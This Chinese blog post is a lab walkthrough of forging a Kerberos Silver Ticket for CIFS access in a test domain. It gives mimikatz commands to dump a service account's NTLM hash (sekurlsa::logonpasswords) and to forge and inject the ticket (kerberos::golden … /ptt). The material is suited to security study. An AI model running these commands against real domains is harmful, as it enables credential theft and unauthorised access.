登录注册写文章

伪造白银票据

伪造白银票据

• 白银票据（Silver Ticket），利用过程是伪造TGS

• 通过已知的授权服务密码生成一张可以访问该服务的票据

• 白银票据生成过程中，不需要经过KDC，不需要域域控交互

• 白银票据依赖服务账户的密码散列值

• 常见服务：LDAP、MSSQL、DNS、CIFS等

实验——使用白银票据伪造CIFS服务权限

准备：

• 域名：dota.test

• 域SID:：S-1-5-21-148781454-1908209042-142103015

• 目标服务器的FQDN：dc.dota.test

• 可利用的服务：cifs

• 服务账号的 NTLM Hash：2d9349a3f260cd283a6c030c01503420

• 需要伪造的用户名：win7

1、在域控制器中，使用mimikatz获取服务账号的NTLM Hash

privilege::debug

log

sekurlsa::logonpasswords

2、伪造白银票据（在域成员机中 win7）

kerberos::golden /domain:dota.test /sid:S-1-5-21-148781454-1908209042-142103015 /target:dc.dota.test /service:cifs /rc4:2d9349a3f260cd283a6c030c01503420 /user:win7 /ptt

伪造白银票据

3、验证权限

验证权限

查看票据

©著作权归作者所有,转载或内容合作请联系作者
平台声明：文章内容（如有图片或视频亦包括在内）由作者上传并发布，文章内容仅代表作者本人观点，简书系信息发布平台，仅提供信息存储服务。

推荐阅读更多精彩内容

【内网学习笔记】29、白银票据
0、前言白银票据（Sliver Ticket）不同于黄金票据（Golden Ticket） Kerberos ...
TeamsSix阅读 2,854评论 0赞 1
Pass The Ticket之白银票据
前言在了解了kerberos流程之后，我们相继学习了ms14-068的利用、黄金票据。从整个流程中每次认证中可以...
CSeroad阅读 6,605评论 0赞 1
黄金票据和白银票据攻击及其原理介绍
票据传递攻击这里介绍域内常用的两种攻击方式：黄金票据Golden ticket、白银票据SILVER TICKE...
LMcream阅读 33,943评论 0赞 20
内网渗透-域环境权限维持
前言在进入内网进行渗透横向过程中，有时候会遇到域环境。学习整理下域环境中权限维持相关的技术。本次实验环境：win...
Tide_诺言阅读 6,785评论 1赞 4
域渗透 | 白银票据利用实例
我们在之前的白银票据的利用中列出了很多可以利用的服务实例，最后只用CIFS来进行举例了，这次再把其他几种服务的利用...
无心_44d4阅读 3,783评论 0赞 0

1赞2赞

赞赏

手机看全文